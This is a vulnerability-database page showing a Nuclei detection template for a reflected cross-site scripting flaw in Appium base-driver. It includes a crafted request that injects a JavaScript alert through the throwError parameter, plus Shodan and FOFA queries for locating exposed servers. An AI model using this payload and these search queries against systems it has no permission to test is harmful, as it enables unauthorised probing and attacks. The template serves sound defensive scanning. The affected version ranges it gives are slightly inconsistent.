Lucene search
+L

Appium base-driver <=10.6.0 - Reflected Cross-Site Scripting

🗓️ 15 Sep 2026 05:39:31Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 4 Views

Reflected XSS in Appium base-driver <=10.6.0 via unescaped throwError and User-Agent fields.

Related
Refs
Code
id: CVE-2026-58191

info:
  name: Appium base-driver <=10.6.0 - Reflected Cross-Site Scripting
  author: str4k3r
  severity: medium
  description: |
    Appium <= 10.7.0 contains a reflected XSS caused by unescaped reflection of throwError query parameter, comments POST field, and User-Agent header in base-driver routes, letting remote attackers execute arbitrary JavaScript, exploit requires crafted HTTP requests.
  impact: |
    Remote attackers can execute arbitrary JavaScript on the server origin, potentially leading to session hijacking or further attacks.
  remediation: |
    Update to version 10.7.0 or later.
  reference:
    - https://github.com/appium/appium/security/advisories/GHSA-3wgp-x9p5-c7cc
    - https://github.com/appium/appium/commit/d94a40af9f8040191ee7888571a1c9d5aec59f89
    - https://github.com/appium/appium/releases/tag/@appium/[email protected]
    - https://nvd.nist.gov/vuln/detail/CVE-2026-58191
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
    cvss-score: 6.5
    cve-id: CVE-2026-58191
    epss-score: 0.00252
    epss-percentile: 0.16693
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    vendor: appium
    product: appium
    shodan-query: 'http.favicon.hash:-144749386'
    fofa-query: 'icon_hash="-144749386"'
  tags: cve,cve2026,appium,xss,base-driver,node

http:
  - raw:
      - |
        GET /test/guinea-pig?throwError=%27%2balert(document.domain)%2b%27 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "alert(document.domain)")'
          - 'contains_all(body, "This page is a Selenium sandbox", "Appium")'
        condition: and
# digest: 4b0a00483046022100c400a28e54ad7300e2fa8a573e26dfdf24b2bbe6ac438cd6686bfacc28d793310221009ae97fb5e7b360b954e9efdc3ac8cc225c3aae9e9e7aea9ad40b451d35a7020a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Sep 2026 18:23Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.16.1 - 6.5
EPSS0.00441
SSVC
4